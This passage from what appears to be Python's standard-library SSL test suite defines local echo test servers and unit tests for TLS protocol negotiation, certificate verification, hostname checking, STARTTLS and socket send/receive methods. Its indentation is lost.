if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# server_context.load_verify_locations(SIGNING_CA)
server_context.load_cert_chain(SIGNED_CERTFILE2)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
